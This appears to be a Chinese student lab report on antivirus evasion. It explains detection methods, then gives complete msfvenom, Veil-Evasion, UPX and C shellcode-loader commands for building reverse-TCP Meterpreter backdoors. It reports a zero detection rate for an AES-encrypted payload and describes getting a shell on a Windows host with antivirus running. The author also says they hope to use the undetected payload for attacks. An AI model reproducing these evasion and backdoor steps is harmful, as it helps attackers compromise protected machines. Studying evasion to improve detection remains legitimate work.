20192204 Exp3-免杀原理与实践

免杀
一般是对恶意软件做处理，让它不被杀毒软件所检测。也是渗透测试中需要使用到的技术。

要做好免杀，就时清楚杀毒软件（恶意软件检测工具）是如何工作的。AV(Anti-virus)是很大一个产业。其中主要的技术人员基本有编制恶意软件的经验。

反过来也一样，了解了免杀的工具和技术，你也就具有了反制它的基础。

1 恶意软件检测机制

1.1 基于特征码的检测

1.1.1 特征库举例-Snort

1.2 启发式恶意软件检测

1.3 基于行为的恶意软件检测

1.1 基于特征码的检测

简单来说一段特征码就是一段或多段数据。如果一个可执行文件（或其他运行的库、脚本等）包含这样的数据则被认为是恶意代码。

AV软件厂商要做的就是尽量搜集最全的、最新的特征码库。所以杀毒软件的更新很重要。过时的特征码库就是没有用的库。

1.1.1特征库举例

特征库、特征码长什么样子呢？

对于商业AV软件来说，这些就是它的竞争点所在，所以是不公开的。

好在，我们有开源的入侵检测平台Snort，它有类似的机制，检测数据包的特征码，检测已知的网络攻击。

--

Snort规则，我们就以这个为例简单理解一下特征码。

示例规则-wuftpd格式化字符串攻击检测规则。content后的就是特征码。

alert tcp $EXTERNAL_NET any -> $HOME_NET 21 (msg:”FTP EXPLOIT wu-ftpd 2.6.0 site exec format string overflow Linux”; flow:to_server, established; content:”|31c031db31c9b046cd8031c031db|”;reference:bugtraq,1387;reference:cve, CAN-2000-0573;classtype:attempted-admin;sid:344;rev:4;)

重要的就是，恶意软件的检测，并不是比对整个文件，

而只能只其中一个或几个片断作为识别依据。

这就是最简单的特征码，或“signature”。

1.2 启发式恶意软件检测

启发式Heuristic，简单来说，就是根据些片面特征去推断。通常是因为缺乏精确判定依据。

“When I see a bird that walks like a duck and swims like a duck and quacks like a duck, I call that bird a duck.” 对恶意软件检测来主说，就是如果一个软件在干通常是恶意软件干的事，看起来了像个恶意软件，那我们就把它当成一个恶意软件吧。典型的行为如连接恶意网站、开放端口、修改系统文件，典型的“外观”如文件本身签名、结构、厂商等信息等。各个厂商会定义自己的检测模式。

优点：

可以检测0-day恶意软件
具有一定通用性

缺点：

实时监控系统行为，开销稍多
没有基于特征码的精确度高

1.3 基于行为的恶意软件检测

最开始提出启发式时，一般也是针对特征扫描的而言的，指通用的、多特征的、非精确的扫描，

所以后来又提出了基于行为的。从理论上讲，基于行为的检测相当于是启发式的一种，或者是加入了行为监控的启发式。

2 免杀技术(Evading AV)综述

--

就常见恶意软件而言，一般AV的检出率为40%-98%。就算你用了最好的AV，恶意软件依然有1/50的概率通过检测。这个概率还可以，貌似多试几种恶意软件就可以了。那免杀的方法当然是针对检测技术的。

--

所以总体技术有：

改变特征码

    如果你手里只有EXE
        加壳：压缩壳 加密壳
    有shellcode(像Meterpreter）
        用encode进行编码
        基于payload重新编译生成可执行文件
    有源代码
        用其他语言进行重写再编译（veil-evasion）

--

改变行为

    通讯方式
        尽量使用反弹式连接
        使用隧道技术
        加密通讯数据
    操作模式
        基于内存操作
        减少对系统的修改
        加入混淆作用的正常功能代码

--

免杀就是让安插的后门不被AV软件发现。除了直接使用现有后门软件外，还有一些方式，在实际中也有用。

<B>非常规方法</B>

    使用一个有漏洞的应用当成后门，编写攻击代码集成到如MSF中。
    使用社工类攻击，诱骗目标关闭AV软件。
    纯手工打造一个恶意软件

--
留后门的思路是这样的：

你写一个有漏洞的软件，开一个服务端口。这个软件本身没问题。然后如果这个端口被攻击，就可以获得系统控制权。

通过meterpreter这种驻留内存的payload，AV软件很难检出。

这样的小漏洞程序大家也有做，自己攻击自己还是很容易的。

当然最好的方法，还是手工打造，自己从头编一个，没有通用工具的特征，AV软件也就杀不出来了。

从头打造当然是相当有难度的，但我们可以利用Metasploit已有的payload来半手工的打造，效果也不错

--

好多盗版、破解、加脱壳软件都会要求你关闭AV。或者的确只能在关闭AV的情况下才能应用。如果有个软件提示你需要关闭AV，你会...一定不吗?

3 免杀效果实测

3.1 恶意代码生成工具

恶意代码功能也是重复类似的，程序员最不屑于做的就是同样的代码写多次。所以就产生了恶意代码的生成工具，可以用原始的功能代码按需组合生成不同的可执行文件，现加上不同的免杀手段。常见的如msfvenom，veil-evasion,backdoor-factory等。

对于这种情况，AV厂商当然是要尽量找到如msfvenom生成软件的特征，而不是搜集所有生成结果的特征了。其结果就是只要msfvenom生成的exe就会检测到，不管你是用了什么编码器，迭代编码的多少次。

在免杀过程中，我们就会使用这样的工具来生成恶意代码，并测试其免杀效果。

3.2 免杀效果的评价

3.2.1 VirusTotal、Virscan

集成了60多个商业杀毒软件的扫描引擎。可以上传免杀处理过的程序进行检测。

如果上传的程序所有软件都杀不出来，virustotal就会把它交给AV厂商们了，然后...在杀毒库更新前，你还可以使用一段时间。

Virustatol不包括各AV软件的行为分析部分(behavioral analysis)。但它自己开发了自己的行为分析引擎。太慢，还没试用。

https://www.virustotal.com/ http://www.virscan.org/

3.2.2 免杀效果参考基准

3.2.3 使用msf生成后门程序的检测

直接将上周做实验时用msf生成的后门文件放在杀毒工具集合网址链接中进行扫描，扫描结果如下：

msfvenom直接生成meterpreter可执行文件，检出率为52/67。67个扫描引擎中有52中把它识别为病毒。

3.3 正确使用msf编码器，使用Msfvenom生成如jar之类的其他文件

Msfvenom是Metasploit平台下用来编码payloads免杀的工具。以Metaspliot的知名度和普及度。理所当然，所有AV厂家都盯着呢，一有新编码算法，马上就得加到特征库里呀。

编码后呢，按理论上讲，编码会降低检出率，大不了多编码几次，总会检不出来。

# msfvenom -p windows/meterpreter/reverse_tcp  -x ./20192204.exe -e x64/xor_dynamic -b '\x00' LHOST=192.168.174.131 LPORT=443 -f exe > 20192204-encoding.exe

从图中可以看出，报毒率还是挺高的，70款杀软中就有54款扫描出病毒，基本上也就是说现在主流的杀软都能杀出来。并且这个比之前的还要高，可能是因为没有用文件作伪装的原因吧。

所以，我猜想如果在使用msf时对它用不同的编码方式，是不是后门代码就不那么容易被扫出来呢？

我测试了一下，假设使用xor异或的方式进行编码（具体指令之前的实验中也有用到就是参数不同而已）

先编码一次试试：

 msfvenom -p windows/meterpreter/reverse_tcp -e x64/xor -i 10 -b '\x00' LHOST=192.168.174.131 LPORT=2224 -f exe > 20192204-encoded.exe

报毒率并没有明显下降：

多编码几次：

msfvenom -p windows/meterpreter/reverse_tcp -e x86/opt_sub -i 4 -b '\x00' LHOST=192.168.174.131 LPORT=2224 -f exe > 20192204-encode.exe

报毒率仍然没有明显下降

原因呢？AV厂商也不傻，人家研究的是编码器本身，shikata_ga_nai总会有解码(decoder stub)部分需要加入的exe中，只要盯住这部分就可以了。

还有模板。模板就是msfvenom用来生成最终Exe的那个壳子exe文件，msfvenom会以固定的模板生成exe，所有它生成的exe，如果使用默认参数或模板，也有一定的固定特征。曾经有一段时间，只要换了模板，就可以对所有AV免杀。现在这招不行了。所以一般来说AV厂商会针对其使用的模板来生成特征码，这样就一劳永逸地解决所有msfvenom生成的恶意代码了。那如果使用msfvenom免杀，就要使用原生的模板。

3.4 veil，加壳工具

Veil-Evasion是一个免杀平台，与Metasploit有点类似，在Kalil软件库中有，但默认没装。免杀效果比较好。

首先输入命令进行veil的下载安装：

sudo apt-get install veil-evasion

安装设置

下载成功后，首先进入root模式，再修改setup.sh：

sudo -s    //进入root模式
cd /usr/share/veil/config
vim setup.sh

输入\clone进行搜索：

找到上图中的白字网址部分：sudo git clone https://github………………

将其网址部分替换为：https://gitee.com/spears/VeilDependencies.git

保存并退出，输入指令veil进行安装：

正常如果不出错将会出现python安装界面，接下来的操作中会出现许多选项，一路next到最后就好：

如果此时没有python弹窗并且出现如下报错提示：
Failed to run (wine) Python pip… Exit code: 2
Failed to run (wine) Python pip future… Exit code: 2
Failed to run (wine) Python pip pefile… Exit code: 2

我在实验中就遇到了这个错误，根据博客
https://cnlnn.github.io/html/Veil安装失败的解决方法.html

中的提示说遇到这种错应该切换到英文环境下安装veil，但我就是在英文环境下安装的-_-

安装无法继续进行，网络上也搜不到相应的解决方法，所以我选择输入指令apt-get remove veil卸载veil重新安装，在重新进行上面的步骤之后这次问题解决了，出现了python弹窗，可以继续进行安装了：

一路next：

此时回到命令行，如果出现如图所示报错：

则按指令提示，输入/usr/share/veil/config/setup.sh --force --silent即可解决问题

此时再一路点击next之后安装完毕，再次输入veil，出现以下界面说明安装成功：

开始使用veil工具：

use evasion					//进入Evil—Evasion
use c/meterpreter/rev_tcp.py 	//进入配置界面
set LHOST 192.168.174.131		//设置反弹链接ip，此处为Kali的ip
set LPORT 12204					//设置端口
generate

设置生成的文件名为20192204veil

系统显示文件的保存路径为：/var/lib/veil/output/compiled/20192204veil.exe

根据生成路径来到文件夹找到生成的文件20192204veil.exe，将其放入
https://www.virustotal.com/gui/home/upload
看看这次有多少搜索引擎会报毒：

检测文件（检出率39/69）

免杀加壳尝试

在文件所在文件夹单击右键在这里打开终端
输入指令upx 20192204veil.exe -o 20192204_veil_upx.exe进行加壳

加壳完毕后重新将文件20192204_veil_upx.exe上传到网站进行检测：

检测文件（检出率39/68），检出率没有丝毫下降

看来目前的杀毒引擎对于加壳的检出能力很强：

3.5 使用C + shellcode编程

使用msfvenom得到shellcode，这里不要忘了将ip改成kali的ip:

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.174.131 LPORT=12204 -f c   

编辑c文件，并将上图中光标所选部分复制进去：

vim shellcode_c.c

在文件末尾加上：

int main() { int (*func)() = (int(*)())buf; func(); }

保存并退出

编译成可执行文件

i686-w64-mingw32-g++ shellcode_c.c -o shellcode_c.exe

将刚刚生成的shellcode_c.exe放到之前的查杀网站查杀：

对恶意代码进行检测（检出率35/69），比之前的39/69下降了一点。

3.6通过组合应用各种技术实现恶意代码免杀

利用python+aes_encrypt

输入如下指令打开veil，选择Evasion：

veil
use evasion    

输入list寻找payload：

输入指令选择payload：

use python/shellcode_inject/aes_encrypt.py
generate
2

按下enter输入kali的ip地址，以及端口12204

按下enter，根据上图中光标选中的文件路径来到/usr/share/veil/./Veil.py，选中并上传到网站进行检测：

这次的报毒率是0，免杀成功！

这里的原理便是使用了数据加密的方式进行多次编译后门软件

4 附加题：用另一电脑实测，在杀软开启的情况下，可运行并回连成功

首先将在3.5veil加壳中生成的后门程序20192204_veil_upx.exe复制到自己的win10主机上，此时杀毒软件腾讯电脑管家已开启：

在kali系统中输入msfconsole打开msf控制台：

输入指令开始攻击（下面还是虚拟机的ip和之前设定的端口：

use exploit/multi/hander
set payload windows/meterpreter/reverse_tcp
set LHOST 192.168.174.131
set LPORT 12204
exploit

在主机端运行之前拷过来的后门程序之后成功在kali端获得了主机的shell，成功在腾讯电脑管家开启的状态下获得主机的操作shell，实验成功！！

5 实验感想

通过本次实践我首先了解到了什么是恶意软件检测机制，明白了检测机制包括基于特征码的检测、基于行为的恶意软件检测、启发式恶意软件检测等等。

其次通过本次实验我了解并使用了恶意程序软件检测网站，https://www.virustotal.com/gui/home/upload ，是一个很好用的集合了很多家杀毒引擎的网站，通过这个网站可以提前测试自己生成的后门程序可以被哪些杀毒软件检出，又可以绕过哪些杀毒软件。

在进行veil对恶意程序加壳的实践中，我首先安装了veil并学会了如何处理在kali下安装veil报错的问题，并且在加壳之后在检测网站中我发现现在的主流杀毒软件都对加壳这种做法有很强的检测能力。而使用c语言＋shellcode的模式是可以降低病毒检出率的。

在使用python+aes_encrypt的实践中，使用注入payload的方式得出的py可以将报毒率下降到0，在后续期待有机会可以学会使用这种报毒率为0的payload来进行攻击。

在附加题的实践中，即使之前使用veil加壳不能降低报毒率，但是加壳后的后门程序仍然可以在腾讯电脑管家等杀毒软件下通过后门程序与msf控制台相配合得到主机的shell，说明该免杀方法仍然具备一定效果。

通过本次实践我了解到了恶意软件查杀机制以及如何“包装”恶意程序使其尽可能通过更多杀毒软件的封锁，本实践的免杀知识与上次实践的后门程序技术相结合一定程度上提高了我通过设计后门程序并在有一定防护基础的电脑上获得shell的能力，本次实践使我受益良多。